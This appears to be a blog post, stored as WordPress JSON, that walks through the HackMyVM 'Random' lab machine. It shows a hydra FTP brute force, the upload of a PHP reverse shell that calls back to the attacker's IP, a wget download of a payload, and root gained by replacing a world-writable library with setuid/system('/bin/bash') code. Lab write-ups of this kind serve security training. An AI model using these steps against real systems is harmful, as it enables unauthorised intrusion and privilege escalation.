{"id":806,"date":"2024-09-12T15:45:30","date_gmt":"2024-09-12T07:45:30","guid":{"rendered":"http:\/\/162.14.82.114\/?p=806"},"modified":"2024-09-12T15:45:30","modified_gmt":"2024-09-12T07:45:30","slug":"hmv-_-random","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/806\/09\/12\/2024\/","title":{"rendered":"hmv[-_-]Random"},"content":{"rendered":"<h1>Random<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544477.png\" alt=\"image-20240912141155640\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544479.png\" alt=\"image-20240912144840474\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.103:21\nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxr-xr--    2 1001     33           4096 Oct 19  2020 html\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.10.102\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 09:0e:11:1f:72:0e:6c:10:18:55:1a:73:a5:4b:e5:64 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLSgYLDfQbPEYlbJk0gqb+20RFg8gTuRcwH60QpS\/cc0adqQGZixvMG6C82PlCKYkY8FITrKpuzWRy4U2FIFMmHqxdLf\/63bCYURP4W\/M0pgjG9nADli+kzhAcpcpvAfuCxSrAXyBLhYOXSCyHzH7+t0f6Yo3xcDvw+a3xoDQGJoGvus9Mtmquhy5+a6svNUdUwhqO04YnuvXIJc8vsJuKEpbuM1DTLIafNcZ8WbxrukbEZJI5waDlzfTxNY0vK5BGsCFyNB2io3vkZmpyXpi+wLVThahdMeOqVZA5YlUFNVqUEi\/IzHbB58YtkAOLwO526FrLs8HiAlfwqNa0PCal\n|   256 c0:9f:66:34:56:1d:16:4a:32:ad:25:0c:8b:a0:1b:5a (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKCX9k1lfU5zOyr7\/QGNFwdlTCWMCdX7jV7GnO9v4C3y79efEtPZv4PeuVrEatM6bdy1U4xVZKM8Fvls+fVYAtw=\n|   256 4c:95:57:f4:38:a3:ce:ae:f0:e2:a6:d9:71:42:07:c5 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINZ6OAWr1xkHzpp4wdSCAOdwflN1vXUg4\/YlNvhEl1pN\n80\/tcp open  http    syn-ack nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -q\n^C\n[!] Keyboard interrupt detected, terminating.<\/code><\/pre>\n<p>No need to keep scanning; there is probably nothing to find here.<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ curl http:\/\/$IP  \n&lt;pre&gt;\n#########################WARNING##########################\neleanor, i disabled your ssh access.\nTake care.\n-alan\n##########################################################\n&lt;\/pre&gt;<\/code><\/pre>\n<p>This gives us two usernames:<\/p>\n<pre><code class=\"language-text\">eleanor\nalan<\/code><\/pre>\n<p>Of these, <code>eleanor<\/code> has no SSH access.<\/p>\n<h3>Sensitive Ports<\/h3>\n<p>Log in to FTP with the default user:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; dir\n229 Entering Extended Passive Mode (|||48644|)\n150 Here comes the directory listing.\ndrwxr-xr--    2 1001     33           4096 Oct 19  2020 html\n226 Directory send OK.\nftp&gt; cd html\n550 Failed to change 
directory.<\/code><\/pre>\n<p>A directory exists, but we cannot get into it.<\/p>\n<h3>Brute-forcing FTP<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ hydra -L user -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP -f\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-12 03:01:59\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2\/p:14344399), ~1793050 tries per task\n[DATA] attacking ftp:\/\/192.168.10.103:21\/\n[STATUS] 276.00 tries\/min, 276 tries in 00:01h, 28688522 to do in 1732:24h, 16 active\n[21][ftp] host: 192.168.10.103   login: eleanor   password: ladybug\n[STATUS] attack finished for 192.168.10.103 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-12 03:03:35<\/code><\/pre>\n<p>Try this user:<\/p>\n<pre><code class=\"language-text\">eleanor\nladybug<\/code><\/pre>\n<p>See what is there:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): eleanor\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; dir\n229 Entering Extended Passive Mode (|||30985|)\n150 Here comes the directory listing.\ndrwxr-xr--    2 1001     33           4096 Oct 19  2020 html\n226 Directory send OK.\nftp&gt; cd html\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||30792|)\n150 Here comes 
the directory listing.\ndrwxr-xr--    2 1001     33           4096 Oct 19  2020 .\ndrwxr-xr-x    3 0        113          4096 Oct 19  2020 ..\n-rw-r--r--    1 33       33            185 Oct 19  2020 index.html\n226 Directory send OK.\nftp&gt; get index.html\nlocal: index.html remote: index.html\n229 Entering Extended Passive Mode (|||8241|)\n150 Opening BINARY mode data connection for index.html (185 bytes).\n100% |************************************************************************************************************************************************|   185      108.44 KiB\/s    00:00 ETA\n226 Transfer complete.\n185 bytes received in 00:00 (53.08 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ cat index.html \n&lt;pre&gt;\n#########################WARNING##########################\neleanor, i disabled your ssh access.\nTake care.\n-alan\n##########################################################\n&lt;\/pre&gt;<\/code><\/pre>\n<h3>Reverse Shell<\/h3>\n<p>An upload attempt fails because of insufficient permissions:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): eleanor\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; dir\n229 Entering Extended Passive Mode (|||15374|)\n150 Here comes the directory listing.\ndrwxr-xr--    2 1001     33           4096 Oct 19  2020 html\n226 Directory send OK.\nftp&gt; cd html\n250 Directory successfully changed.\nftp&gt; put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||10218|)\n550 Permission denied.\nftp&gt; exit\n221 
Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ head revshell.php\n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.102&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>Trying to log in over SSH as this user fails:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ssh eleanor@$IP\nThe authenticity of host &#039;192.168.10.103 (192.168.10.103)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:v2xcWcAAUcAUpB1Nz4duz+QZL1zveUkV\/SmLUqBhuUc.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;192.168.10.103&#039; (ED25519) to the list of known hosts.\neleanor@192.168.10.103&#039;s password: \nThis service allows sftp connections only.\nConnection to 192.168.10.103 closed.<\/code><\/pre>\n<p>As expected it failed, but it gave a hint: we can connect with <code>sftp<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ sftp eleanor@$IP\neleanor@192.168.10.103&#039;s password: \nConnected to 192.168.10.103.\nsftp&gt; dir\nhtml  \nsftp&gt; cd html\nsftp&gt; put revshell.php \nUploading revshell.php to \/html\/revshell.php\nrevshell.php                                                                                                                                               100% 3912     1.9MB\/s   00:00    \nsftp&gt; dir\nindex.html    revshell.php  \nsftp&gt; exit<\/code><\/pre>\n<p>The upload succeeded; request the file to trigger it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ curl http:\/\/$IP\/revshell.php\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;504 Gateway Time-out&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;504 Gateway Time-out&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.14.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544480.png\" alt=\"image-20240912151640820\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@random:\/$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nalan:x:1000:1000:alan,,,:\/srv\/ftp:\/bin\/bash\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\neleanor:x:1001:1001:,,,:\/srv\/ftp:\/bin\/bash\n(remote) www-data@random:\/$ ls -la \/home\ntotal 16\ndrwxr-xr-x  4 root    root    4096 Oct 19  2020 .\ndrwxr-xr-x 18 root    root    4096 Oct 19  2020 ..\ndrwxr-xr-x  2 alan    alan    4096 Oct 19  2020 alan\ndrwxr-xr-x  2 eleanor eleanor 4096 Oct 19  2020 eleanor\n(remote) www-data@random:\/$ cd \/home\/alan\n(remote) www-data@random:\/home\/alan$ ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan  4096 Oct 19  2020 .\ndrwxr-xr-x 4 root root  4096 Oct 19  2020 ..\n-rw------- 1 alan alan    52 Oct 19  2020 .Xauthority\n-rw-r--r-- 1 alan alan   220 Oct 19  2020 .bash_logout\n-rw-r--r-- 1 alan alan  3526 Oct 19  2020 .bashrc\n-rw-r--r-- 1 alan alan   807 Oct 19  2020 .profile\n-rw------- 1 alan alan   162 Oct 19  2020 note.txt\n-rwsr-sr-x 1 root root 16832 Oct 19  2020 random\n-rw-r--r-- 1 root root    19 Oct 19  2020 root.h\n-rw-r--r-- 1 root root  1576 Oct 19  2020 rooter.o\n(remote) www-data@random:\/home\/alan$ cat root.h\nvoid makemeroot();\n(remote) www-data@random:\/home\/alan$ cat rooter.o \nELF&gt;\ufffd@@\nUH\ufffd\ufffdH\ufffd=\ufffd\ufffd]\ufffdSUCCESS!! 
But I need to finish and implement this functionGCC: (Debian 8.3.0-6) 8.3.0zRx\nN                                                                                                 A\ufffdC\n\ufffd\ufffd\n+rooter.cmakemeroot_GLOBAL_OFFSET_TABLE_puts\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\n                                                    \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd .symtab.strtab.shstrtab.rela.text.data.bss.rodata.comment.note.GNU-stack.rela.eh_frame @80\n&amp;SS1X90\ufffdB\ufffdW\ufffdR@h\n\ufffd \n       0\ufffda(remote) www-data@random:\/home\/alan$ cd ..\/eleanor\/\n(remote) www-data@random:\/home\/eleanor$ ls -la\ntotal 28\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19  2020 .\ndrwxr-xr-x 4 root    root    4096 Oct 19  2020 ..\n-rw-r--r-- 1 eleanor eleanor  220 Oct 19  2020 .bash_logout\n-rw-r--r-- 1 eleanor eleanor 3526 Oct 19  2020 .bashrc\n-rw-r--r-- 1 eleanor eleanor  807 Oct 19  2020 .profile\n-rw------- 1 eleanor eleanor   80 Oct 19  2020 note.txt\n-rw------- 1 eleanor eleanor   14 Oct 19  2020 user.txt\n(remote) www-data@random:\/home\/eleanor$ sudo -l\nbash: sudo: command not found<\/code><\/pre>\n<h3>Switching Users with su<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@random:\/var\/www\/html$ ls -la \/srv\/ftp\ntotal 12\ndrwxr-xr-x 3 root    ftp      4096 Oct 19  2020 .\ndrwxr-xr-x 3 root    root     4096 Oct 19  2020 ..\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 html\n(remote) www-data@random:\/var\/www\/html$ cd \/srv\/ftp\/html\n(remote) www-data@random:\/srv\/ftp\/html$ ls -la\ntotal 16\ndrwxr-xr-- 2 eleanor  www-data 4096 Sep 12 03:15 .\ndrwxr-xr-x 3 root     ftp      4096 Oct 19  2020 ..\n-rw-r--r-- 1 www-data www-data  185 Oct 19  2020 index.html\n-rw-r--r-- 1 eleanor  eleanor  3912 Sep 12 03:15 revshell.php\n(remote) www-data@random:\/srv\/ftp\/html$ su eleanor\nPassword: \neleanor@random:~\/html$ cd ~\neleanor@random:~$ ls -la\ntotal 12\ndrwxr-xr-x 3 root    ftp      4096 Oct 19  2020 
.\ndrwxr-xr-x 3 root    root     4096 Oct 19  2020 ..\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 html\neleanor@random:~$ cd \/home\/eleanor\/\neleanor@random:\/home\/eleanor$ ls -la\ntotal 28\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19  2020 .\ndrwxr-xr-x 4 root    root    4096 Oct 19  2020 ..\n-rw-r--r-- 1 eleanor eleanor  220 Oct 19  2020 .bash_logout\n-rw-r--r-- 1 eleanor eleanor 3526 Oct 19  2020 .bashrc\n-rw------- 1 eleanor eleanor   80 Oct 19  2020 note.txt\n-rw-r--r-- 1 eleanor eleanor  807 Oct 19  2020 .profile\n-rw------- 1 eleanor eleanor   14 Oct 19  2020 user.txt\neleanor@random:\/home\/eleanor$ cat user.txt \nihavethapowah\neleanor@random:\/home\/eleanor$ cat note.txt \nalan disabled my access via SSH but not my account.\nHe is a bad admin!\n-eleanor<\/code><\/pre>\n<h3>Privilege Escalation via Shared Library Hijacking<\/h3>\n<pre><code class=\"language-bash\">(remote) eleanor@random:\/home\/eleanor$ cd ..\/alan\/\n(remote) eleanor@random:\/home\/alan$ ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan  4096 Oct 19  2020 .\ndrwxr-xr-x 4 root root  4096 Oct 19  2020 ..\n-rw-r--r-- 1 alan alan   220 Oct 19  2020 .bash_logout\n-rw-r--r-- 1 alan alan  3526 Oct 19  2020 .bashrc\n-rw------- 1 alan alan   162 Oct 19  2020 note.txt\n-rw-r--r-- 1 alan alan   807 Oct 19  2020 .profile\n-rwsr-sr-x 1 root root 16832 Oct 19  2020 random\n-rw-r--r-- 1 root root  1576 Oct 19  2020 rooter.o\n-rw-r--r-- 1 root root    19 Oct 19  2020 root.h\n-rw------- 1 alan alan    52 Oct 19  2020 .Xauthority\n(remote) eleanor@random:\/home\/alan$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.104 - - [12\/Sep\/2024 03:27:15] &quot;GET \/random HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<p>Transfer the binary over to take a look; decompiled with <code>ida<\/code>:<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int 
v3; \/\/ ST1C_4\n  time_t v4; \/\/ rdi\n\n  v3 = atoi(argv[1]);\n  v4 = time(0LL);\n  srand(v4);\n  if ( v3 == rand() % 9 + 1 )\n    makemeroot(v4);\n  else\n    puts(&quot;Wrong number&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>The logic is simple: it is a number-guessing game, and picking any number in <code>1~9<\/code> is basically bound to hit, but there is no hidden function or method that gives a shell, so check the linked libraries:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ldd random\n        linux-vdso.so.1 (0x00007ffd82952000)\n        librooter.so =&gt; not found\n        libc.so.6 =&gt; \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007fc9fa374000)\n        \/lib64\/ld-linux-x86-64.so.2 (0x00007fc9fa57a000)<\/code><\/pre>\n<p>Look for the one that was not found!<\/p>\n<pre><code class=\"language-bash\">(remote) eleanor@random:\/home\/alan$ ldd random\n        linux-vdso.so.1 (0x00007ffd348d4000)\n        librooter.so =&gt; \/lib\/librooter.so (0x00007f69e6101000)\n        libc.so.6 =&gt; \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007f69e5f40000)\n        \/lib64\/ld-linux-x86-64.so.2 (0x00007f69e6112000)\n(remote) eleanor@random:\/home\/alan$ ls -la \/lib\/librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19  2020 \/lib\/librooter.so<\/code><\/pre>\n<p>It is writable, so try hijacking the library:<\/p>\n<pre><code class=\"language-bash\">(remote) eleanor@random:\/tmp$ nano exp.c\nUnable to create directory \/srv\/ftp\/.local\/share\/nano\/: No such file or directory\nIt is required for saving\/loading search history or cursor positions.\n\nPress Enter to continue\n\n(remote) eleanor@random:\/tmp$ cat exp.c\n#include &lt;stdlib.h&gt;\n\nvoid makemeroot()\n{\n        setuid(0);\n        setgid(0);\n        
system(&quot;\/bin\/bash&quot;);\n}\n(remote) eleanor@random:\/tmp$ gcc -shared exp.c -o \/lib\/librooter.so\nexp.c: In function \u2018makemeroot\u2019:\nexp.c:5:2: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n  setuid(0);\n  ^~~~~~\n  setenv\nexp.c:6:2: warning: implicit declaration of function \u2018setgid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n  setgid(0);\n  ^~~~~~\n  setenv\ncollect2: fatal error: cannot find &#039;ld&#039;\ncompilation terminated.\n(remote) eleanor@random:\/tmp$ ls -la \/lib\/librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19  2020 \/lib\/librooter.so<\/code><\/pre>\n<p>That did not work, so link it locally and transfer it over:<\/p>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ gcc -shared a.c -o librooter.so \na.c: In function \u2018makemeroot\u2019:\na.c:5:9: warning: implicit declaration of function \u2018setuid\u2019 [-Wimplicit-function-declaration]\n    5 |         setuid(0);\n      |         ^~~~~~\na.c:6:9: warning: implicit declaration of function \u2018setgid\u2019 [-Wimplicit-function-declaration]\n    6 |         setgid(0);\n      |         ^~~~~~\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.103 - - [12\/Sep\/2024 03:38:33] &quot;GET \/librooter.so HTTP\/1.1&quot; 200 -\n\n# eleanor\n(remote) eleanor@random:\/tmp$ cd \/lib\n(remote) eleanor@random:\/lib$ wget http:\/\/192.168.10.102:8888\/librooter.so\n(remote) eleanor@random:\/lib$ ls -la librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19  2020 librooter.so\n(remote) eleanor@random:\/lib$ mv librooter.so librooter.so.bak\n(remote) eleanor@random:\/lib$ mv librooter.so.1 librooter.so\n(remote) eleanor@random:\/lib$ ls 
-la librooter.so\n-rw-rw-rw- 1 eleanor eleanor 15480 Sep 12 03:37 librooter.so\n(remote) eleanor@random:\/lib$ chmod +x librooter.so<\/code><\/pre>\n<p>Run it several times and see whether we get a shell!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544481.png\" alt=\"image-20240912154255749\" \/><\/p>\n<p>Got it!<\/p>\n<pre><code class=\"language-bash\">root@random:\/home\/alan# ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan  4096 Oct 19  2020 .\ndrwxr-xr-x 4 root root  4096 Oct 19  2020 ..\n-rw-r--r-- 1 alan alan   220 Oct 19  2020 .bash_logout\n-rw-r--r-- 1 alan alan  3526 Oct 19  2020 .bashrc\n-rw------- 1 alan alan   162 Oct 19  2020 note.txt\n-rw-r--r-- 1 alan alan   807 Oct 19  2020 .profile\n-rwsr-sr-x 1 root root 16832 Oct 19  2020 random\n-rw-r--r-- 1 root root  1576 Oct 19  2020 rooter.o\n-rw-r--r-- 1 root root    19 Oct 19  2020 root.h\n-rw------- 1 alan alan    52 Oct 19  2020 .Xauthority\nroot@random:\/home\/alan# cat note.txt \nI need to finish random program.\nNow it generates a random number between 1-10 and it compares\nthis number with my number.\nI will be happy if i guess the number.\nroot@random:\/home\/alan# cd \/root\nroot@random:\/root# ls -la\ntotal 24\ndrwx------  3 root root 4096 Oct 19  2020 .\ndrwxr-xr-x 18 
root root 4096 Oct 19  2020 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct 19  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   16 Oct 19  2020 root.txt<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Random Information Gathering Port Scan \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-806","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=806"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806\/revisions"}],"predecessor-version":[{"id":807,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806\/revisions\/807"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=806"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}